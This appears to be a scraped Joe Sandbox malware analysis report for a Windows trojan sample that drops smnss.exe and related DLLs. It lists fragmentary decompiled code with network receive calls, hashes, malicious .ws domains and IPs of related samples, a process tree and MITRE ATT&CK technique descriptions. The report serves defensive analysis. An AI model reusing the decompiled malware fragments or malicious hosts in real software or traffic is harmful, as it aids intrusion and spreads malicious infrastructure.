API ID: Open$CloseValue
String ID:
API String ID: 503941690-0
Opcode ID: 64a7c2170a8598c629de1f1ef6930b91c6947248a2fba3b3b579a1264ac83601
Instruction ID: d52cf87232b6bef55ae32812e2a2d770b7a0cdaf13e0b01d7b079ce95a9ef0d7
Opcode Fuzzy Hash: 64a7c2170a8598c629de1f1ef6930b91c6947248a2fba3b3b579a1264ac83601
Instruction Fuzzy Hash: 8711C2F0808305AFDB00EF69C18575EBBF4BB84358F40892EE88897241E378D6488F92

Uniqueness

Uniqueness Score: -1.00%

Function 004067E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004067E0(void* __ebx, signed int _a4) {
				void* _v8;
				char _v1036;
				signed int _v1040;
				intOrPtr _v1044;
				signed int _v1048;
				signed int _t13;
				signed int _t20;
				signed int _t22;
				void* _t23;
				signed int* _t24;
				intOrPtr* _t25;

				_t24 = _t23 - 0x414;
				_t20 =  &_v1036;
				_v1044 = 0x400;
				_v1048 = 0;
				 *_t24 = _t20;
				memset(__ebx, ??, ??);
				_v1040 = 0;
				_v1044 = 0x400;
				_v1048 = _t20;
				_t13 = _a4;
				 *_t24 = _t13;
				L004086B8();
				_t25 = _t24 - 0x10;
				_t22 = 0;
				if(_t13 + 1 > 1) {
					 *_t25 =  &_v1036;
					_t22 = (E00406856( &_v1036, _t20) & 0xffffff00 | _t17 - 0x00000190 < 0x00000000) & 0x000000ff;
				}
				return _t22;
			}

APIs

memset.MSVCRT ref: 00406803
recv.WS2_32 ref: 00406822

Part of subcall function 00406856: lstrlen.KERNEL32(?,?,?), ref: 0040686A
Part of subcall function 00406856: sscanf.MSVCRT ref: 0040688E

Strings

fc@, xrefs: 00406850

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrlenmemsetrecvsscanf
String ID: fc@
API String ID: 2556557004-2333546356
Opcode ID: c1133dbf17f94d7c7e6c6e6ca5dd0c921707f1a6a51cd10e35ba8147b46d26d8
Instruction ID: 7b1cb7ca667fa739690624300255a696f657d489af5130fe59f4ce6b6cdf8f5c
Opcode Fuzzy Hash: c1133dbf17f94d7c7e6c6e6ca5dd0c921707f1a6a51cd10e35ba8147b46d26d8
Instruction Fuzzy Hash: CBF01DB05043049EDB00FF25C58535EBBE4AB44348F51886DE6C8A7382D638D5898B56

Uniqueness

Uniqueness Score: -1.00%

Function 0040B460 Relevance: 5.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0040B460(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, int _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _v24;
				void* _t20;
				long _t24;
				void* _t25;
				int _t28;
				intOrPtr _t38;
				int _t40;
				intOrPtr* _t49;
				long* _t50;

				_t43 = __esi;
				_t32 = __ebx;
				_v8 = __edi;
				_t40 = _a4;
				_v16 = __ebx;
				_v12 = __esi;
				_t38 =  *0x418284;
				if(_t38 == 0) {
					E0040B0E0(_t20);
					_t38 =  *0x418284;
					if( *((intOrPtr*)(_t38 + 0x30)) >= 0) {
						goto L2;
					} else {
						goto L7;
					}
				} else {
					if( *((intOrPtr*)(_t38 + 0x30)) < 0) {
						L7:
						E0040B3B0(_t32, _t43);
						_t38 =  *0x418284;
						if( *((intOrPtr*)(_t38 + 0x30)) == 0) {
							goto L3;
						} else {
							goto L9;
						}
					} else {
						L2:
						if( *((intOrPtr*)(_t38 + 0x30)) != 0) {
							L9:
							_t24 = GetLastError();
							 *_t49 =  *((intOrPtr*)(_t38 + 0x2c));
							_t25 = TlsGetValue(??);
							_t50 = _t49 - 4;
							 *_t50 = _t24;
							SetLastError(??);
							 *_t40 = _t25;
							_v24 = _t40;
							 *((intOrPtr*)(_t50 - 4)) =  *((intOrPtr*)( *0x418284 + 0x2c));
							_t28 = TlsSetValue(??, ??);
							if(_t28 == 0) {
								goto __ecx;
							}
						} else {
							L3:
							_t28 =  *(_t38 + 0x28);
							 *_t40 = _t28;
							 *(_t38 + 0x28) = _t40;
						}
					}
				}
				return _t28;
			}

APIs

GetLastError.KERNEL32(?,?,?,?,?,00405F1A), ref: 0040B4E3
TlsGetValue.KERNEL32(?,?,?,?,?,00405F1A), ref: 0040B4EE
SetLastError.KERNEL32(?,?,?,?,?,?,00405F1A), ref: 0040B4FC
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00405F1A), ref: 0040B516

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ErrorLastValue
String ID:
API String ID: 1151882462-0
Opcode ID: 16660377808b608b832b0cbaea9d7365e9406ce6128743baf1b4238b0422be3c
Instruction ID: 439973a8ce157f22f3a963889ba98c70b340b09c43d7307190215458f466d12f
Opcode Fuzzy Hash: 16660377808b608b832b0cbaea9d7365e9406ce6128743baf1b4238b0422be3c
Instruction Fuzzy Hash: 8B210375A0060A9FCB40DF69DA8469ABBF4FF48310F1081AADC44A7352E734BE51CBC9

Uniqueness

Uniqueness Score: -1.00%

Function 00402B1D Relevance: 5.1, APIs: 4, Instructions: 57stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402B31

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402B59
lstrcat.KERNEL32 ref: 00402B81
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402BA3

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: 2826283af6f699d7c3e83025989127017e0512d040b59a07861e73eee1f0863b
Instruction ID: 03b09b6922a9c514b299c22ddce90b04ecaf30bc7003352be57799a9fe594460
Opcode Fuzzy Hash: 2826283af6f699d7c3e83025989127017e0512d040b59a07861e73eee1f0863b
Instruction Fuzzy Hash: C121FCB59143148BCB10EF64D9816DEBBF4BB84314F40857FE584A3281EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00402936 Relevance: 5.1, APIs: 4, Instructions: 56stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 0040294A

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402972
lstrcat.KERNEL32 ref: 0040299A
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 004029BC

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: eb2a7022fab22290f9337c8e99424667dadfbef0a52a594ea57fdecd6ba1bcb4
Instruction ID: 058901da40b0e2efb01319e0cab41814326d79342e400853ca70bd999cd91e9a
Opcode Fuzzy Hash: eb2a7022fab22290f9337c8e99424667dadfbef0a52a594ea57fdecd6ba1bcb4
Instruction Fuzzy Hash: AE21EE759143148BC710EF64D98169EBBF4FB84314F00897FE5C5A3241EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00402D1F Relevance: 5.1, APIs: 4, Instructions: 55stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402D33
lstrcat.KERNEL32 ref: 00402D4D

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402D75
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402D97

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: 0b97575310a7fa724369c596606ff1760cc3b7cec2d0dbe3f6b4ef6916d691dc
Instruction ID: c94e486dd441945c80f89e6855cf6e362e59878be9d52d1e169f04df5a17e1bb
Opcode Fuzzy Hash: 0b97575310a7fa724369c596606ff1760cc3b7cec2d0dbe3f6b4ef6916d691dc
Instruction Fuzzy Hash: 8521ECB69143148BCB10EF64D9816DEBBF4BB84314F40857FE589A3241EB349698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0040285D Relevance: 5.1, APIs: 4, Instructions: 54stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402871
lstrcat.KERNEL32 ref: 0040288B

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 004028B3
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 004028D5

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: 27d8094f7ce17b5c984ca7facbf4f5c21df0b35fc8132f7ae4f869e5194c155d
Instruction ID: a2a94c62469e04ea526b3170561a4d1959144f6524308fe89c3ba5c1d6912741
Opcode Fuzzy Hash: 27d8094f7ce17b5c984ca7facbf4f5c21df0b35fc8132f7ae4f869e5194c155d
Instruction Fuzzy Hash: 2F21ED769043048BC710EF64D9815CEBBF4FB84314F40857FE985A3241EB349698CF96

Uniqueness

Uniqueness Score: -1.00%

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
64.70.19.203	144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Get hash	malicious	Browse	xircus.ws/kin/logout.php
	Br6Pmt0MiZ.exe	Get hash	malicious	Browse	thaus.ws/6
	R5JbUb3muW.exe	Get hash	malicious	Browse	thaus.ws/6
	kmHFEwF36g.exe	Get hash	malicious	Browse	thaus.ws/1
	VkTXaNHTs6.exe	Get hash	malicious	Browse	eaffuebudbeudbbk.ws/6
	wNtMSZRvzI.exe	Get hash	malicious	Browse	eafuebdbedbedggk.ws/4
	y7ddF1vGqA.exe	Get hash	malicious	Browse	deauduafzgezzfgk.ws/3
	6FRRo6QFF2.exe	Get hash	malicious	Browse	wduufbaueeubffgu.ws/5
	Photo-149-101.jpg.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	winsvcs.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	Photo-137-158.jpg.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	9v7gUCpZOr.exe	Get hash	malicious	Browse	eaffuebudbeudbbu.ws/2
	1rP65UzlyY.exe	Get hash	malicious	Browse	eaffuebudbeudbbu.ws/5
	JAGk3xeQ5I.exe	Get hash	malicious	Browse	geueudusl.ws/vnc/2
	SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe	Get hash	malicious	Browse	fheuhdwdzwgzdggu.ws/2
	SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe	Get hash	malicious	Browse	wduufbaueeubffgr.ws/2
	jHbg4HhuFN.exe	Get hash	malicious	Browse	deauduafzgezzfgr.ws/5
	Olalq9sdOF.exe	Get hash	malicious	Browse	tpleflpokadkeoot.ws/pe/1
	http://aptekanasza.home.pl	Get hash	malicious	Browse	r.mega-us-pills.ws/?snitch&se_referrer=&default_keyword=Apteka%20Nasza&keyword=Apteka%20Nasza

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CENTURYLINK-LEGACY-SAVVISUS	tDT2c9rE9g	Get hash	malicious	Browse	208.143.254.55
	yX14v6CZxe	Get hash	malicious	Browse	208.160.70.10
	Ares.mips	Get hash	malicious	Browse	206.96.179.222
	zoz4Qw1K9N	Get hash	malicious	Browse	204.189.173.7
	vBxtwpmgTw	Get hash	malicious	Browse	216.91.192.0
	pnS6DsNQ71	Get hash	malicious	Browse	64.242.160.116
	d7DYF3R9OC	Get hash	malicious	Browse	208.130.17.195
	xd.arm	Get hash	malicious	Browse	208.162.52.146
	jew.x86	Get hash	malicious	Browse	66.100.154.34
	m68k	Get hash	malicious	Browse	208.152.129.253
	mirai.m68k	Get hash	malicious	Browse	206.156.156.51
	6uVsz9DuXE	Get hash	malicious	Browse	206.24.110.77
	bot.mpsl	Get hash	malicious	Browse	209.27.221.2
	rB8VZmWI0H	Get hash	malicious	Browse	206.79.113.243
	iT6kZAEo4N	Get hash	malicious	Browse	206.97.209.205
	YrWVel38dA	Get hash	malicious	Browse	64.28.94.54
	Rmno10rXkT	Get hash	malicious	Browse	64.242.79.75
	IR3whuypdi	Get hash	malicious	Browse	208.174.83.110
	Zi9hcQbEdu	Get hash	malicious	Browse	206.134.241.141
	DNMhV4D3Xo	Get hash	malicious	Browse	64.240.81.114
VOXEL-DOT-NETUS	V24vW9xuGA.exe	Get hash	malicious	Browse	63.251.106.25
	NhMwbuPR18.exe	Get hash	malicious	Browse	63.251.106.25
	iGLun5erjW.exe	Get hash	malicious	Browse	63.251.106.25
	K3roNPLIUG.exe	Get hash	malicious	Browse	63.251.106.25
	V24vW9xuGA.exe	Get hash	malicious	Browse	63.251.106.25
	zaoXryfJay.exe	Get hash	malicious	Browse	63.251.106.25
	iGLun5erjW.exe	Get hash	malicious	Browse	63.251.106.25
	zaoXryfJay.exe	Get hash	malicious	Browse	63.251.106.25
	290bksBsI2.exe	Get hash	malicious	Browse	63.251.106.25
	VZVXeKGt8v.exe	Get hash	malicious	Browse	63.251.106.25
	290bksBsI2.exe	Get hash	malicious	Browse	63.251.106.25
	SrgIeuy3Hr.exe	Get hash	malicious	Browse	63.251.106.25
	VZVXeKGt8v.exe	Get hash	malicious	Browse	63.251.106.25
	SrgIeuy3Hr.exe	Get hash	malicious	Browse	63.251.106.25
	hp6mGgg1UJ.exe	Get hash	malicious	Browse	63.251.106.25
	2WvzGzOV5I.exe	Get hash	malicious	Browse	63.251.106.25
	LrbE12M6mp.exe	Get hash	malicious	Browse	63.251.106.25
	2WvzGzOV5I.exe	Get hash	malicious	Browse	63.251.106.25
	4aDWNapFFI.exe	Get hash	malicious	Browse	63.251.106.25
	LrbE12M6mp.exe	Get hash	malicious	Browse	63.251.106.25

Target ID:	0
Start time:	08:24:05
Start date:	17/07/2022
Path:	C:\Users\user\Desktop\EAfIchN1gN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EAfIchN1gN.exe"
Imagebase:	0x400000
File size:	42596 bytes
MD5 hash:	343AAB3B8C412C765F9FC753E1F18520
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Target ID:	4
Start time:	08:24:11
Start date:	17/07/2022
Path:	C:\Windows\SysWOW64\ctfmen.exe
Wow64 process (32bit):	true
Commandline:	ctfmen.exe
Imagebase:	0x400000
File size:	4160 bytes
MD5 hash:	B76123561821C1EF6C90EB2F63793911
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Target ID:	5
Start time:	08:24:12
Start date:	17/07/2022
Path:	C:\Windows\SysWOW64\smnss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\smnss.exe
Imagebase:	0x400000
File size:	42596 bytes
MD5 hash:	BEB57891AD9E1F6933F96B67C620CE21
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Target ID:	7
Start time:	08:24:15
Start date:	17/07/2022
Path:	C:\Windows\SysWOW64\smnss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\smnss.exe
Imagebase:	0x400000
File size:	42596 bytes
MD5 hash:	BEB57891AD9E1F6933F96B67C620CE21
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Target ID:	8
Start time:	08:24:17
Start date:	17/07/2022
Path:	C:\Windows\SysWOW64\smnss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\smnss.exe
Imagebase:	0x400000
File size:	42596 bytes
MD5 hash:	BEB57891AD9E1F6933F96B67C620CE21
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Target ID:	12
Start time:	08:24:20
Start date:	17/07/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1416
Imagebase:	0xb80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	13
Start time:	08:24:21
Start date:	17/07/2022
Path:	C:\Windows\SysWOW64\smnss.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\smnss.exe
Imagebase:	0x400000
File size:	42596 bytes
MD5 hash:	BEB57891AD9E1F6933F96B67C620CE21
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Target ID:	30
Start time:	08:25:29
Start date:	17/07/2022
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff678970000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EAfIchN1gN.com_343aab3b8c412c765f9fc753e1f18520

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_smnss.exe_dede56669acbf059a837271e30c65f7ed19fe3a_e99d7581_06cf4a96\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER561.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B9.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF26.tmp.dmp

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

C:\Windows\SysWOW64\ctfmen.exe

C:\Windows\SysWOW64\grcopy.dll

C:\Windows\SysWOW64\grcopy.dll:Zone.Identifier

C:\Windows\SysWOW64\satornas.dll

C:\Windows\SysWOW64\shervans.dll

C:\Windows\SysWOW64\smnss.exe

C:\Windows\SysWOW64\smnss.exe:Zone.Identifier

C:\Windows\SysWOW64\zipfi.dll

C:\Windows\SysWOW64\zipfiaq.dll

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
EAfIchN1gN.com_343aab3b8c412c765f9fc753e1f18520

Function 10002020 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 111
networkCOMMON

Function 00401150 Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Function 00401149 Relevance: 12.1, APIs: 8, Instructions: 65
COMMON

